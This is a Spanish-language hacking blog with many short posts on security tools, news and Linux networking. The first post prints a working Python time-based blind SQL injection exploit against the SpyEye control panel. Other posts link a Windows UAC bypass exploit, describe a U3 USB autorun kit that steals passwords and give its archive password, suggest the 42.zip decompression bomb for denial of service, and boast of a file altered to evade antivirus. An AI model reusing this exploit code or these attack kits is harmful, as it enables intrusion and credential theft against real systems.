Descubierta Vulnerabilidad en Spyeye

SpyEye es un malware con capacidades de puerta trasera que intenta robar información sensible relacionada con la banca en línea y las transacciones de tarjetas de crédito de la máquina infectada. SpyEye se vende a través de su autor en un formato fácil de configurar forma de kit, que contiene el ejecutable del troyano en sí, el mando y control (C & C) del servidor y la configuración básica para orientar sitios web de banca. A partir de principios de 2011, SpyEye se ha fusionado la funcionalidad de la familia troyano Zeus, que ha sido vendida al autor SpyEye, y ahora es cada vez más sofisticados en lo que respecta a las características y funcionalidad,En agosto de el 2011 se libero el codigo. En agosto de el 2011 se libero el código fuente de el malware y 1 mes mas tarde ya tenemos la primera vulnerabilidad con el primer exploit generado , afecta a las siguientes firmas :

Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Trojan:Win32/EyeStye.H (Microsoft)
A variant of Win32/Spy.SpyEye.CA (NOD32)
W32/Malware.QOOC (Norman)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)

Python Code: fuente

from httplib import HTTPConnection from time import time from sys import exit, argv, stdout import urllib  print """   Example:                                                           Spypwned 192.168.0.12 /directorio/ "version()"                           """   if len(argv)<=3: exit() else:   print "[+]Iniciando..."   host = argv[1] path = argv[2] sql = argv[3] port = 80    hash = "" full = []   for k in range(48,122):      full.append(k) full.append(0) # full vale [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # Es el charset a probar  delay = 0.5 a=1  while a <= 32:     for i in full:         j = 0         if i == 0:  exit('\n[+]FIN\n')         #         start = time()         # hora de inicio para el delay         conn = HTTPConnection(host,port)         #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         data = urllib.urlencode(values)         print data         conn.request("GET", path + "frm_cards_edit.php?" + data )         response = conn.getresponse()         read = response.read()              print read                   if response.status == 404: exit('[+]404')         # da 404 luego termina         now = time()         if now - start > delay:         # ha salido true luego el caracter es valido             stdout.write(chr(i))             stdout.flush()             hash += chr(i)             a += 1             break;         else: j += 1         print "i vale %s, y J vale %s" %(i,j)

Tambien disponemos de un tracker , que nos avisa en todo momento los bots que hay conectados a la red , direcciones , nacionalidades y estados.

NetworkMiner 1.1

NetworkMiner es una herramienta de análisis forense (NFAT) para Windows. NetworkMiner se puede utilizar como un sniffer de red pasivo / o como herramienta de captura, con el fin de detectar sistemas operativos, sesiones, host, etc . NetworkMiner también puede analizar los archivos PCAP para análisis fuera de línea y regenerar / ensamblar archivos transmitidos y los certificados de los archivos PCAP.

NetworkMiner recopila los datos (por ejemplo, las pruebas forenses) sobre las máquinas de la red en lugar de recoger datos sobre el tráfico en la red. La vista de la interfaz de usuario principal está centrado en host (información agrupada por host) en lugar de centrado en paquetes (información que se presenta como una lista de paquetes / cuadros).

web y descarga

OpenVas

OpenVAS ( en un principio GNessUs , que viene de el famoso Nessus) es un marco de diversos servicios , herramientas y tests , que ofrece un análisis de vulnerabilidad y la solución de gestión de vulnerabilidades.
El escáner de seguridad real se acompaña con una alimentación diaria actualizada de la Red de Pruebas de Vulnerabilidad (NVTs), más de 21.000 (a fecha de mayo de 2011).
La primera vez que lanzamos el OpenVas hay que hacer 2 cosas basicas , la primera es crear un certificado : openvas-mkcert (hay que poner valores que existan, no tienen que ser reales) y la segunda es crear un usuario en el servidor : openvas-adduser (creamos el user y salimos con CTRL+D). Antes de arrancar el servidor hay que actualizar la lista de plugins con el commando : openvas-nvt-sync (tambien tarda lo suyo..) una vez terminado , lanzamos el servidor con : openvassd (es normal que se tome su tiempo al lanzar el server ya que son mas de 20.000 plugins) .
Una vez que esta todo configurado en el servidor (y esta lanzado) podemos empezar con el cliente (que es desde el que lanzamos los tests) lo lanzamos con : OpenVAS-Client , una vez arrancado lo conectamos al servidor con el usuario y password que creamos antes con el openvas-adduser (echo esto tendremos acceso a todos los plugins y podremos hacer tests a la ip que queramos)

Ntop

Ntop es un Sniffer con gestion via web imprescindible para cualquier red, los protocolos que es capaz de monitorizar son: TCP/UDP/ICMP, (R)ARP, IPX, DLC, Decnet, AppleTalk, Netbios, y ya dentro de TCP/UDP es capaz de agruparlos por FTP, HTTP, DNS, Telnet, SMTP/POP/IMAP, SNMP, NFS, X11 , es muy util a la hora de ver quien consume mas ancho de banda en una red , o para saber que dispositivos hay en tu red y que es lo que hacen ^^. Si no lo teneis ya descargado, os lo podeis bajar de su web o desde el apt , aptitude o cualquier gestor de paquetes , esta disponible en windows y linux , lo que pasa es que creo que para win necesita licencia .....
Una vez instalado , el primer paso es asignarle una password al Administrador de el ntop , para eso abrimos una root-shell , y ejecutamos:
ntop --set-admin-password
ahora hay que lanzarlo , podemos lanzarlo directamente:
ntop
o podemos lanzarlo como servicio:
service ntop start
una vez lanzado nos creara un servidor web desde el que podemos configurar todo el software he incluir plugins y al que podemos acceder abriendo un navegador , escribiendo nuestra ip y el puerto 3000 , algo asi : 192.168.1.69:3000 , tambien podemos : 127.0.0.1:3000

Windows Vista/7 UAC Bypass Exploit

Exploit en el UAC de windows 7 y vista, para ganar la preciada cuenta system escalando permisos desde una cuenta limitada o estandar , para usarlo es muy facil simplemente nos bajamos la app (dentro viene un video que lo explica bien claro xD) , abrimos una consola y lo ejecutamos (poc.exe) , ganando permisos completos para todo el windows (probado en cuentas restringidas y de administracion.)
descargar desde la fuente

Vulnerabilidad Usb U3

El ataque se basa en la opción de autorun que hasta el sp3 de el windows xp venia activado por defecto ,esta opción afecta a cualquier dispositivo CD/USB que sea introducido en el ordenador ejecutando el fichero autorun.inf , teniendo esto en cuenta se puede modificar el autorun.inf para ejecutar lo que queramos. Algunos USB al introducirlos te crean la unidad virtual U3 sin preguntar ni naa, bueno la idea es modificar la memoria U3 (por llamarla de alguna forma) de estos USB y modificarla a nuestro gusto , bien para eso existe la app Universal U3 Launch pad, que sirve para pasarle al USB una iso ya modificada a nuestro gusto , para eso tenemos un pack de herramientas (pwdump, mailpassview,etc) ya automatizado y comprimido en una iso, esa iso se encuentra en la applicacion swichblade solo teneis que copiarla de el swichblade a la carpeta bin de el Universal U3 launch pad y lo ultimo seria copiar el archivo SBconfig.exe en la carpeta raiz de el USB y activarlo, despues lanzamos el Universal , automaticamente te hara un backup y sobrescribira tu memoria U3 en el USB.

fuente mejor explicada xDD

descarga

contraseña : appstrike

Anomos cifrado p2p

Anomos es un encriptador de redes p2p con estas caracteristicas:
* Libre y de Código Abierto Código
* Sin publicidad, sin spyware
* Standalone Client - n servicios en segundo plano
* Fácil de usar
* Disponibilidades para Windows y GNU / Linux (y OSX, teóricamente)

para mas informacion su web es esta y para descargar aki.

Ethergrouik

Ethergrouik es un proyecto open source (C + GTK) cuyo objetivo principal es representar graficamente las conexiones por protocolos de red, con una interfaz que nos recuerda al mitico etherape pero con alguna opcion extra.

esta disponible para windows y linux , su web es esta y para descargar aki

El zip de la muelte

42.zip es un fichero zip de 42.374 bytes, contiene 16 zips que a su vez contienen otros 16 zips y así hasta 6 veces. Los 16 últimos zips contienen un fichero de 4,3 Gb cada uno. Si descomprimimos el fichero 42.zip de 42.374 bytes obtendriamos 4.5 Pb de datos descomprimidos.

Casi todos los antivirus lo tienen detectado en su base de datos , aunque ante una cosa asi, que es capaz de "frezeear" cualquier ordenador , cualquier proteccion extra sera muy util ya que para ataques DDos es muy tentador xDD

• 16 x 4294967295 = 68.719.476.720 (68GB)
• 16 x 68719476720 = 1.099.511.627.520 (1TB)
• 16 x 1099511627520 = 17.592.186.040.320 (17TB)
• 16 x 17592186040320 = 281.474.976.645.120 (281TB)
• 16 x 281474976645120 = 4.503.599.626.321.920 (4,5PB)

fuente
descarga

Jugada de Kaspersky

Hace unos dias os comentaba el servicio online de virus total , Adicionalmente, VirusTotal envía estos archivos subidos a su sitio web a las compañías de seguridad informática con la idea de que si existe algún problema, puedan agregarlas a sus definiciones de virus, claro, previo analisis propio de dicho fichero que posiblemente pueda contener virus o malware. Hay es donde a kaspersky se le ocurrio hacer 20 ficheros totalmente limpios y añaden diez de ellos como si fueran malware en sus motores. Que es lo que ocurre? , bien pues estos archivos son enviados al resto de compañias de seguridad para que despues de que los analizen puedan actualizar sus bases de datos (aunque realmente los archivos no contienen nada de malware) , al parecer han picado muchas compañias de antivirus metiendolos directamente en sus firmas , entre ellas se destacan estas: F-Secure, McAfee, Symantec y Fortinet


para ver el codigo fuente y la explicacion oficial de kasperky , han publicado la noticia en el blog de PcMag.

resultados de virus total:

• http://www.virustotal.com/analisis/ca2e...a6577f02c434
• http://www.virustotal.com/analisis/7e7...836f364867923
• http://www.virustotal.com/analisis/7e79b4efde...4867923

fuentes

Configurar un equipo en red en linux (shell)

Pequeña guia de como configurar tu linux en red desde la shell .
Bien partimos de la base que nuestro linux nos reconoce nuestra tarjeta de red al 100% y sin ningun tipo de error.
Comandos Basicos:

iwconfig : Nos informa todas las interfaces que tenemos
iwconfig (interface) (opcion)
ejem: iwconfig eth1 mode managed

ifconfig : Nos da informacion de la red y dispositivos
ifconfig (interface) (opcion)
ejem: ifconfig eth1 down

tambien puedes asignar la ip y la mascara de subred con el ifconfig ejem:
ifconfig eth1 (ip) (maskara de subred)
ifconfig eth1 192.168.0.99 255.255.255.0

route : Sirve para asignar una puerta de enlaze a un dispositivo o por defecto
route (opcion) (opcion) (puerta enlaze) (interface)
route add default gw 192.168.0.1 eth1

Bien nos faltarian los DNS , para estos he visto todo tipo de commandos y scrips , pero sin duda la mejor opcion es modificar el fichero resolv.conf que esta en /etc/resolv.conf
e introducir tus dns , el fichero seria una cosa parecida a esto:

search (namehost)
nameserver 192.168.1.1

despues de modificar este fichero, si queremos que funcione tendriamos que reiniciar todo lo que tenga que ver con la red:

/etc/rc.d/init.d/network restart

todo esto es para configurarla manualmente, siempre podemos tirar de dhcp simplemente poniendo dhcpd eth1
para comprobar que nos funciona podemos hacer ping a nuestro router y una vez conteste otro ping a www.cualquierweb.es para ver si salimos a internet

Servicio online antivirus gratuito

VirusTotal (suena mal la verdad xD) es un analizador de archivos que busca en los archivos que les subas , nunca habeis tenido la duda de "no tenia que haberlo ejecutado" o "me han roto el antivirus" o simplemente no usuais antivirus (cada vez mas comun) bien pues con este servicio saldreis de dudas. Por supuesto lo he probado con un file especialmente modificado para que no se detecte xD (solo 4 positivos jeje) , lo que me ha gustado es que utiliza mas de 40 motores de antivirus distintos y asi puedes ver lo que te diria cualquier antivirus con el archivo en cuestion, os pego el reporte:

a-squared	4.5.0.48	2010.01.12	Riskware.RemoteAdmin.Win32.VB!IK
AhnLab-V3	5.0.0.2	2010.01.12	-
AntiVir	7.9.1.134	2010.01.12	-
Antiy-AVL	2.0.3.7	2010.01.12	-
Authentium	5.2.0.5	2010.01.12	-
Avast	4.8.1351.0	2010.01.11	-
AVG	9.0.0.725	2010.01.12	-
BitDefender	7.2	2010.01.12	-
CAT-QuickHeal	10.00	2010.01.12	-
ClamAV	0.94.1	2010.01.12	-
Comodo	3556	2010.01.12	-
DrWeb	5.0.1.12222	2010.01.12	-
eSafe	7.0.17.0	2010.01.11	-
eTrust-Vet	35.2.7232	2010.01.12	-
F-Prot	4.5.1.85	2010.01.12	-
F-Secure	9.0.15370.0	2010.01.12	-
Fortinet	4.0.14.0	2010.01.12	-
GData	19	2010.01.12	-
Ikarus	T3.1.1.80.0	2010.01.12	not-a-virus:RemoteAdmin.Win32.VB
Jiangmin	13.0.900	2010.01.12	Trojan/Genome.rns
K7AntiVirus	7.10.944	2010.01.11	-
Kaspersky	7.0.0.125	2010.01.12	not-a-virus:RemoteAdmin.Win32.VB.a
McAfee	5858	2010.01.11	-
McAfee+Artemis	5858	2010.01.11	-
McAfee-GW-Edition	6.8.5	2010.01.12	-
Microsoft	1.5302	2010.01.12	-
NOD32	4763	2010.01.12	-
Norman	6.04.03	2010.01.12	-
nProtect	2009.1.8.0	2010.01.12	-
Panda	10.0.2.2	2010.01.11	-
PCTools	7.0.3.5	2010.01.12	-
Prevx	3.0	2010.01.12	-
Rising	22.30.01.03	2010.01.12	-
Sophos	4.49.0	2010.01.12	-
Sunbelt	3.2.1858.2	2010.01.12	-
Symantec	20091.2.0.41	2010.01.12	-
TheHacker	6.5.0.3.147	2010.01.12	-
TrendMicro	9.120.0.1004	2010.01.12	-
VBA32	3.12.12.1	2010.01.12	-
ViRobot	2010.1.12.2132	2010.01.12	-
VirusBuster	5.0.21.0	2010.01.11	-

El falso "hackeo" de la web de la presidencia española

Bien pues no se si os habeis enterado de el jaleo que se monto despues de saber que el presupuesto para el mantenimiento de la web de la presidencia española eran 11 millones de euros para los 6 primeros meses de el año, bueno pues ahi no queda la cosa , salio una noticia en varios sitios que decia que habian "hackeado" la web el primer dia y que habian puesto la foto de mrbean, bueno pues al final no es para tanto la intrusion por que realmente no la hubo , el problema es debido a el cross-site scripting (XSS) que haciendo una peticion especialmente manipulada consigues ver la imagen a nivel local en tu navegador , en ningun caso se han modificado archivos en el server ni nada parecido en estas 2 webs (1 y 2) lo explican mejor, en cualquier caso una web que su presupuesto son 11 millones no puede permitirse esto bugs ....

hackmeeting maravillas

Los días 9, 10, 11 y 12 de Octubre llegará el Hackmeeting al Patio Maravillas, la decima edicion lleva el nombre de +MADHACK , por supuesto el evento es gratuito , abierto y libre. Si quieres, puedes participar en el hackmeeting proponiendo un Nodo (charla, taller, o lo que sea) o apuntándote a la lista de correo que organiza este evento , para mas informacion este es su blog
fuenT

Windows 7 y los pantallazos azules ....

Una Vulnerabilidad encontrada hace poco por Lauren Gaffie y que afecta a todos los Windows Vistas y Windows 7 (incluidos 64 bits) , genera el mitico pantallazo azul ya casi olvidado desde los windows 98(aunque con el oc no tanto). Al parecer la vulnerabilidad afecta al SMB (Service Message Block ) y se proboca al reescribir la pila de un protocolo heredado de el windows Vista (que malo es el copy paste jeje) Al parecer no es el primero que aparece y seguramente que tampoco el ultimo , volveran los clasicos ataques con cor ? xD , cosas como estas seran otra vez posibles.
fuente

Gerix Wifi Cracker

"Este software es tan sencillo de usar, que incluso mi abuela puede usarlo para crackear redes inalámbricas" Ese es el "eslogan" de este nuevo software de seguridad para redes inalambricas que me ha echo mucha gracia XDD, los requisitos para que funcione son aircrack-ng, xterm, machchanger, zenity and por supuesto python-qt3, esta es su web y para descargarlo usar estos links BackTrack Official Deb - Source Code TAR - Arch Linux Official BUILD - Gentoo Official EBUILD

Takedown (la pelicula de Kevin Mitnick)

El ultimo encarcelamiento de Kevin Mitnik en 1995 , fue uno de los casos mas sonados en todo el mundo por la lentitud del proceso (hasta la celebración del juicio pasaron más de dos años), y las estrictas condiciones de encarcelamiento a las que estaba sometido (se le aisló del resto de los presos y se le prohibió realizar llamadas telefónicas durante un tiempo por su supuesta peligrosidad.)

La vida de Kevin Mitnick y, en especial, la persecución que condujo a su captura en 1995 han dado lugar a multitud de libros y otro material de ficción. De entre todos, destaca la novela Takedown, que relata su último arresto , bien pues de momento esta pelicula la tenemos en el youtube con calidad bastante aceptable y subtitulada al español, aqui os dejo los links

Parte 1, Parte 2, Parte 3, Parte 4, Parte 5, Parte 6, Parte 7, Parte 8 y Parte 9

El P2P no vulnera la LPI

Segun: 07-07-2009 - Pablo Romero - El Mundo .- Raul N. García Orejudo, magistrado titular del Juzgado Mercantil número 7 de Barcelona, opina en el auto que los intercambios P2P "no encuentran un acomodo claro y específico en los comportamientos que prohíbe la ley, en especial la reproducción, distribución y comunicación pública sin autorización". Por fin !!! nos dieron la razon las redes no son ilegales , los archivos no son ilegales , las copias no son ilegales , en el unico caso, que si que seria ilegal seria si nos lucrasemos mas que ellos xdd.

fuente

Localizando el ISP de una IP

Bueno pues si el tracert no nos saca de dudas os dejo una serie de servicios que si que te diran de donde pertenece dicha ip.
El siguiente mapa te muestra los servicios por zonas .

ARIN

Buscar IP:

RIPE

Buscar IP:

APNIC

Buscar IP:

LACNIC

Buscar IP:

AFRINIC

Buscar IP:

El criptograma perdido

Os dejo un criptograma echo por Bruce Schneier ,para el ultimo numero de una revista Wired y homenajeando la trama y los misterios de lost y que por cierto todavia esta por resolver. Esta claro que algo tienen que ver los repetitivos numeros 4, 8, 15, 16, 23 y 42 que salen en la serie tantas y tantas veces (y que seguiransaliendo) , uno de los problemas mas grandes que veo es que puede estar en cualquier idioma (aunque seguramente este en ingles) ya que en la serie hablan demasiados idiomas.
Hay lo dejo !!

fuente